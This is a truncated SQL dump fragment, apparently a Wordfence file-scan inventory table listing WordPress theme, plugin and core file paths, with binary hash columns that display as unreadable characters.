�q�@!9�e�:`\0�f','wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-customizer-scripts-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kbA�����I�G1[','\nQR^���F�-���BnR�X�ܴ�W��?G��','',0,'?'),('�C���C*�v�\0�_\0','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1ɪ�[�v����Y�','m5oA��K<�f�X]�zu,#	��3�s�ߵ','',0,'?'),('�߄_\'_>B�	�d�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/css/css.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$)B�4GQ\'[E','�|L���_~U�B��\n\\����I�����(\\','',0,'?'),('\"��:��l�	�PǢ��','wp-content/themes/hitmag/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1`̺#��+&>�Yhi��','�a(��J`!�^񧴈~���]|�\"b�i','',0,'?'),('%�M�����Jy�W','wp-content/themes/hitmag/inc/kirki/includes/scripts/class-kirki-scripts-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M�*�=<�\'����&','vX��=�F�H0�.�k����(�`U���','',0,'?'),('&	�(�Ø�u:�f�','wp-content/themes/university-hub/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�нUh��F\r��o��','W�:�4L��24(A����.�u@���D��A��p','',0,'?'),('4�}T�k�D\'W','wp-content/plugins/wp-cerber/assets/rateit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)3U�d�/��{\ZK3E�','�,-3�\"�a��~����P�c���8�F��M','',0,'?'),('7kq������g>((','wp-content/themes/twentytwentyone/assets/css/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/%�5P�,`[�@6','�WEٺǎδU���mU�V��\r��O���z��','',0,'?'),('=��\0a#�()I�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/selection/active-line.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!���t�zt��KG','�7�|\Zwqe�׹��uFN,:�\n��,M3S���B','',0,'?'),('=�aC��z�4<','wp-content/themes/singularity/page-sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B�C���[onc�','ߥ-�峁�MA_��\Z�>Hq��ߨ���*�','',0,'?'),('EP�P�T�������','wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-sanitization.php',0,'j[�n*�o�\\�','j[�n*�o�\\�','_�~QJ��vp~�zA0LW���N��·��x','',0,'?'),('G�w��[@+C&�W','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_stacked.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�#r&�߼��F�','%蠢u��|F�X�)|���\r�R<�O��G','',0,'?'),('Jv#�\"F���T,;�','wp-content/themes/enigma/css/enigma-theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h;�\Z$4��<h���Q89','��pOySO�X�5�C�8�]��HҴ\n����B','',0,'?'),('U&����1�T9','wp-content/themes/wp-simple/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w7E�@��%C.ۆwI','ǕI{�+$�`o�	�>�C�M�[\0B�\Z8y�','',0,'?'),('Vn�`�G�}>a\\','wp-includes/block-patterns/text-two-columns-with-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���N o�F\0�A\n','cUȫd4�B�nD����Q��n+R��J1e','',0,'?'),('\\�����AV*籿','wp-includes/js/jquery/ui/slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ҏ��9�4g��','/\0�ȷ�s�d�Z�Ʈ�6����[�-\ZM ?u','',0,'?'),('e������~Ь9�','wp-content/themes/twentytwenty/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�4�a{|��r�K)l','p3\\Ll#J��Cv�\n6j�n���Նs�i�_�','',0,'?'),('hq�Ж�k�������','wp-content/themes/wp-simple/parts/frontpage-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gu�\"�X��\\0Bu·','K��ZDf}�~����is�*��kZ[�����x@^','',0,'?'),('j���-<uȬ]�J �','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/switch.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AT��\Z>�n�\'rw�,�','-2 }�\r^�#�k\Z����u�l��TV�. ','',0,'?'),('xiQѷ�/8W@\r�˓','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Iv^���]�:w�O6u','���������<�f\n5�cZ>r;SY.�ˑ�_�','',0,'?'),('{@��M=�����C��#','wp-content/themes/simpleshift/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�2�l���J@@10�Z','WWJ- Ό���%n�M�\n0��^�.H�N>���','',0,'?'),('������dүϸ�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/bin/authors.sh',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J	�M��@�N��ը?','�ࠜf&��n�����E �ɥ�VѾm��.��','',0,'?'),('�c��nx�Ժ|�','wp-includes/class-walker-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('��%�If�Q�9�;P','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x�[�G�`�9','�AT萶�G1�NbqY:֏|jt�|_�ܤx','',0,'?'),('�����2\0\"_���','wp-content/themes/hitmag/inc/widgets/sidebar-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_�w�z��qg�','<�,�s°W<Z\0,Ukf��(>����\\�{`Z��r','',0,'?'),('�����n��Nd','wp-includes/js/hoverintent-js.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' p��.`�u76��?','Y!�:\nA��ː	��ګ�Zg�,=�|����','',0,'?'),('�]�*�.>`E��f�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�F���h�瀁1-�','6!o�m��ݎ^�.�^@˨��v7�	I�}��','',0,'?'),('�ݡ=��Nx��K�`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��R������\\��','j��� �����=��$W�^�P�i�Z��\"','',0,'?'),('�sc�Ev��O8�','wp-content/themes/twentynineteen/sass/media/_captions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'^�_��_]E�M\'so','�����-L���n�@A��!��@����f��','',0,'?'),('͟Z��I�c�_��m','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/coffeescript/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@n-��N4� �`G','i��5.��;�W)��?8\n�|K�VMKH��','',0,'?'),('�D2�qɜ5÷�}ǩ','wp-content/themes/catch-responsive/js/jquery.cycle/jquery.cycle2.tile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_kr��4 ���h\0�','\\���/J�FQ!X��H�?y7iT)ST�k��','',0,'?'),('��`���HΥ߳!�,','wp-content/themes/singularity/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��d�tu@Q�','\'%N�A�inN��J3<���\r�\r�+|W�_�!','',0,'?'),('��d��=��@hs�:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJP��e0u�g�۔�','U�WM����slL����9#Tb�Wj?\\�u���','',0,'?'),('���3��ڪL��','wp-content/themes/catch-responsive/inc/customizer-includes/catchresponsive-customizer-sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y햱�ڢE��#o�t','o �yl�a5�%/�Y\'�Z}���J�E��Y�Ԟ','',0,'?'),('�rJ�<p>����Z�','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����*J\0���\0�','�7�C�:r�xe��BM�����sx8�d;�+','',0,'?'),('�&/�db�d�q�2/','wp-admin/includes/class-wp-community-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��nu�_�hY&\'V[','B{�\r_�أ���M\'��\n~6)���+��᠘','',0,'?'),('�%w45�X��泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��^I\'�]!�����','��Ǧ�bt�5��f�����c��kd��m','',0,'?'),('�uGL)ẹ���O','wp-content/themes/graphene/images/social/dopplr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-��%d3��ce�5','�������AZ��)�ݠ��y`WVf �zԝq','',0,'?'),('\0��]�a�v���CY','wp-includes/class-wp-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�+@,�G,��S^�y�','�(8j�C[-��1�Ơ��ʖ��l3Om�','',0,'?'),('�?H�����h�D0	','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﬨ�rz���d�','�h���+�][e+�h�ӆ��FY� V','',0,'?'),('���NVԱ��z�Z','wp-includes/js/jquery/ui/effect-shake.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('ǭ���kOl 9ڇ�J','wp-content/themes/twentytwentyone/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uH�+-x���i��k�','�!}�@�,Ж@���9�ڏ+��+{�4�4@7��','',0,'?'),('7��r�(�����]','wp-content/themes/authorize/assets/stylesheets/font-awesome/HELP-US-OUT.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n�7,�z\r�A�S','|�\\��l��V�E2G-���-[��*���d�n','',0,'?'),('\Z(�c�ʞ���9�d�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/lib/codemirror.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"/%C����jI\'{6','�����i�T�ў�k�?�{t�2��VҊ���','',0,'?'),('\ZQ���%,Aq��3','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/seti.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�Y&}�5�Pw�ԞB','�B�c!�������\Z?�6����U,�M_�','',0,'?'),('�M\n��ψ��6=֒','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-dashicons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ˢ$��Krǡ)Fb��','�tM�V_d�B���A��4�D�ڇ��ǒ}��3	(','',0,'?'),(')��_�J�����','wp-includes/js/media-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wɊ��Ur���c[2','�Q�疁�n�s;�;��Z�<☱4K;~{','',0,'?'),('+�El>�z�#�X','wp-content/themes/advance/inc/kirki/assets/js/controls/color.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�������+u.','��-gZ��y�OeO�\0�髚aj�v�\Z��k','',0,'?'),('Fnʹ=8�_�?�F�','wp-content/plugins/wp-cerber/assets/flags/lt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���\0��H�b–�','�l�w��L+�u�Ţ�U��J&�������','',0,'?'),('G<7e�t�/�W�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0L�ş��\r�{VW�','��\'&ܔ[m`�ϊ�c2E��%�W�GW�䉷','',0,'?'),('L}b&�۵�b','wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��Tz�g�\'†U�c','�����굗�Ij��2%]��\\&q��Jw\\�','',0,'?'),('Wd�l��\09?��i���','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��-���5��_a�_','!Pz4Y-C�i�Yk��-\0���nb:���a�[','',0,'?'),('^嫥�%��=��\r��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/smarty/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�\r��A�r�]��','��w�/,�T�|U�Z�U9Ͱ��]��O��H�g�','',0,'?'),('`�&��锥~K3/d','wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�\"b\"�%X=&���','�2��U+҆�5�~�=�=FL�A�ʯ�,S��','',0,'?'),('�-g^<q�!�9��%�','wp-content/themes/advance/inc/kirki/assets/scss/customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��V�\'\r!�w[','��G�@�������jA��i\\c��@��..L','',0,'?'),('�R s�.*P�D�N','wp-content/themes/authorize/components/navigation/navigation-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i=P���j�P�b','��\0��Y\r4�kp\'If����ݡb7��<G-�','',0,'?'),('��0�|�7�+���\"','wp-content/themes/brickyard/template-landing-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĵ�w~˘�&\'\\','�pٝ��¢Dv�Q��H�PJ��A�6��]��Rb','',0,'?'),('�\'ѯ�H��o3kVX','wp-content/plugins/wp-cerber/assets/flags/to.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��Un��ze��','^�7��\r)���KFd��FG6B�����(\0_*','',0,'?'),('���ґ-���\r�{,�','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿ����s�y��','|�uIP�wh5ڎ.m\"*n_�� 9����J�P�','',0,'?'),('�~��L��*�,�<:�','wp-admin/includes/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lp�Bd����Z�','�O� �n�uO\nd�7K[\"}��7\'p���`��`','',0,'?'),('�Sx��4�@o�w�N','wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`k<,��j3�eE4��','��m����N��Dڽ��a�\r��q���1�i�[+','',0,'?'),('�T\ZJ#,�X�0wp:','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/tern/tern.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n���5��Ϻ�&!k','BC�U���,Q`dc����J9�!q�(���r�','',0,'?'),('���:m��[ݢ�:#','wp-includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('����W�� pV0p','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/edit/matchtags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TQ\'���]w�����uŶ','��`��N	��ն�bxSO �~�9Ͷ\n�B�2','',0,'?'),('�I��\\j���x���g','wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','‹?���a�0��9JQ\Z�','���*�Q����_(G:*��ηd������.','',0,'?'),('�]P�JQƀ6o֢��;','wp-includes/Requests/Exception/HTTP/428.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�B��}�^�t*','C�O�W%���tߏ�Y�|��&�0�VŒ�\\�','',0,'?'),('���j7r[�,��Z��','wp-admin/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�,/����L�;�','��kNIM\0���ڿX\Z��S��ŁԾ��W�','',0,'?'),('�Ys}���\r�$dO�','wp-content/themes/hitmag/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӥ���ݳ{#i�(2	','��KqF7��,[��fb��`�ص�|F�O�{?Y','',0,'?'),('��>p0�����*','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�B�oDj�.R��','�19�%*s�O}#b�l��?���05C��Nl�','',0,'?'),('������q����F)','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ʀ���c7T+��K','��ͻ9y �}9�`{wX�f Ø���Iv�(�','',0,'?'),('P�ɲ�A�[��u�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/tomorrow-night-bright.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��\rX�Ie��Q���','ȽD���/�����(Pp2�S��+�	Z�#T','',0,'?'),('4��B�\07qoB�o6�','wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('\Z��lm��@��','wp-includes/customize/class-wp-customize-date-time-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('�-��\'g���P�\\�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�V�#ҹ���4�','Gp�f��Hv����\Z��x�8����1C�[�4A','',0,'?'),('���}��>�|��I','wp-content/themes/twentynineteen/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����?����/��L��','v��b3샪k\n!{;�]��\\�;~=J�8����','',0,'?'),('#!�~L[+\0ss��','wp-content/themes/brickyard/content-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��f��v~�f�x$K','�İ��K�I�\Z\0�i��K�gP����','',0,'?'),('&��!�1_{g[�}�','wp-content/themes/catch-flames/content-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�?�4�q;��P�l�','e����r,�r�s[���,��(Ơ��i�5|','',0,'?'),('D�8hFޛBViR�','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�]Nt�f��B}o	]','�q�̿��j�d���eo\n�%�;�����','',0,'?'),('L,\Z\"�\0C�ʡ8y�','wp-includes/js/dist/primitives.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�1��~�i!�EKHK/','�S�R�8P���oa:@c���E~�|�Ji�','',0,'?'),(']K�\r��b�J��I.�','wp-content/themes/graduate/assets/js/unminified/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0������uA��','>����\\��>+�.����ʪ��X�2�C','',0,'?'),('j׻���q.�*;��2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�#���o\"x��<�','��i�!��\'��j�T+d�Q��B�K�D@h4�G','',0,'?'),('t�)�}�Sj-��Ҍ','wp-content/themes/event/inc/settings/event-common-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]\0��#-{R�L�','��[�����4�:w�NT\Z���M��1�Z�x','',0,'?'),('u�Y�G\n�K��a~�','wp-content/themes/the-best/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�>�,Z�-�E�5w�;','�y�8b�ש�*R�H�6�;�uT�!�\"�\'�; B','',0,'?'),('v�2=z�@�WAF�','wp-content/themes/wp-simple/parts/tax_tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*��;�6x�vdX','Q`�1��6Yu�P��i�*�uc��ۘ\\4���','',0,'?'),('w�es��i<�O�J%�','wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	~��ZJ�yΧ�%���','�hH��M����7�m��\'iB�@�>�','',0,'?'),('}�>�����\n)�śY','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ķ.M��zA��As�','��G�@�������jA��i\\c��@��..L','',0,'?'),('��2������n�n','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/yeti.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_#��I��','f\'J�M��*��GXm|�=LH)�?���J3ڵ��','',0,'?'),('�2l�8G3��?� ','wp-content/themes/advance/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�刎ٌMZ�W���','�%aܾ6�1#b��{�;.!���ߤ�*w','',0,'?'),('�Ը��%\ZD�y�Z','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�$u�e|)�\'aD�k�','�cA���P/Ɖ���wޝʐ#ۋ�\\�`','',0,'?'),('�Z��d*��Y��ژ�','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5f����Җ�Ph�','�K;��C��l]�?`w9�0����CmĂ�N�','',0,'?'),('�-g�`�G�5~<','wp-content/themes/gambit/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�տQ.e��<2�a���','�*F[�d��z�Oq�X<y�%ӈڑ9��x��','',0,'?'),('���.텳�‘�B�VD','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/mode/multiplex.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�� \n�f��P��\Z','Ւ�AG�Fy��#�&�T�X���!�','',0,'?'),('�ӎA}ҎWZ5=*t�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b;v\'�g��~����k','m�!�M��J\"v�>,���0�\0՜ɫ� &jِ�','',0,'?'),('���*�1�!�$}nh�','wp-content/themes/authorize/components/page/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ᴄ{�tf�/=�i!','s�>H�:�^G���6�OL��V (_@��Uǚ','',0,'?'),('�ޫ� Y�z0���','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-group-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�εSs�7�hE���!','��r�s�,�1=e�S{��i� �i�0~��n','',0,'?'),('�*��k�um1=-���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW B���>ToR��J','8ȼ�?$[�g1N4}��{�Y�K�J�$��C90','',0,'?'),('�r�W�3���᥾V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�p�ES���c�V','�<�=\0�[Z\n2|닢��\0?6������������','',0,'?'),('�K4���q���q�k','wp-content/themes/catch-flames/inc/panel/customizer/upgrade-button/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7���ݯҿ[W�\'%�','�tCK1��Iʙ�]�q��e�T�\0�@f��9�r','',0,'?'),('�0��7pg�ޡ�߯:U','wp-content/themes/authorize/components/footer/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3����ꅫ','�t9�5P�2���B����X�هr)�4Oe��','',0,'?'),('����T�k�]��','wp-content/themes/wp-simple/inc/kirki/kirki/autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�`���7��ZV�؅','�\nr^�a^�qXA%��V�4)0�6��ZOHS��','',0,'?'),('\n7�j)e�4��/�Qe','wp-content/themes/graphene/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڜ�~VIۧE��j\'`:','�/�A��Z��*v�I���C�\\3�� jO��','',0,'?'),('�{�YI�Z�fV�csq','wp-content/themes/catch-flames/js/jquery.cycle.source/jquery.cycle2.shuffle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ܬ�n��mw0��&:[','5��C����o����S���X���d���X','',0,'?'),('�ܒI�H/��fim','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/dashicons.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yrK�{�J��mf�Q��','畦��A\'!���K��rN�2����u�v.�d','',0,'?'),('����a��n','wp-content/themes/singularity/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q,��o\\�	+���','.jY�Z��߶�� cXB+���״�z�h;','',0,'?'),('�ѵd1\r��\ZUB�S>','wp-content/themes/event/inc/customizer/functions/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{G��\"-Qe�c�','kO`�nXV�\0�ڝ�\Z\r���kTN�aw9pH�n','',0,'?'),('2���f\r�!|�2�','wp-content/themes/brickyard/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ןd]B=bЗ��\")<k-','�2Q�ށ�2��0\"�m�i䕏&�\"�2A�&�c�','',0,'?'),(':�X��2�M��~��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�4vLhN�!��2|','���3iA(���p���GD��ڔ����','',0,'?'),('@ρ���q��g�5m��','wp-content/themes/quicksand/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�\Z�J����p�x�<�','�v�>ʎn@$�7|���V�V#�0wk ۳&:','',0,'?'),('C�y��8�\'a���','wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0mj���Ԟ�W','�͛=��ېI�hK�g\0��%T.��]��\r��~','',0,'?'),('L���8��\\�ݼ+','wp-admin/images/imgedit-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\'��6U�������t','�?�؎)�.l�����%�<�(�_� 6�`^c7','',0,'?'),('Y�U��h|kU$��;˜','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DZc�ժ�h�Ǘ�','x\n��	�sd��26*�P�ꫡ�f�t��45�bz','',0,'?'),('k�fn}�;��6��','wp-content/themes/brickyard/images/icon-twitter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��/�p�����4h+T�','?�+���3��J@O!�hu�SchM��\\�','',0,'?'),('m�ñ�~���R�?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�!�aJ:e��c�','3|h|��Kqh�{� \r7��kH��\\�~e�l-�','',0,'?'),('p۞�2N<:Z�7�r�','wp-includes/js/tw-sack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('s��p;��燁�;-F�','wp-content/themes/advance/inc/widgets/advance_welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R$v�K�H|�Ykh}\Z��','5�(��o���Ȥ�va��p�H���iI��XG)','',0,'?'),('u�)8FG9�C�(���','wp-includes/js/wp-ajax-response.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/pM]�{\"@���s�:l�','�B�HQW�2����a��w��C���- Y��','',0,'?'),('{o�S^+*Z,t	��','wp-content/themes/wp-simple/inc/kirki/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%[���DGgN�qPP','cPg�^l_� ��	�q�����8)���,7׋','',0,'?'),('�eBU\\k�h�tK_�6*','wp-includes/blocks/subhead/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�L[� 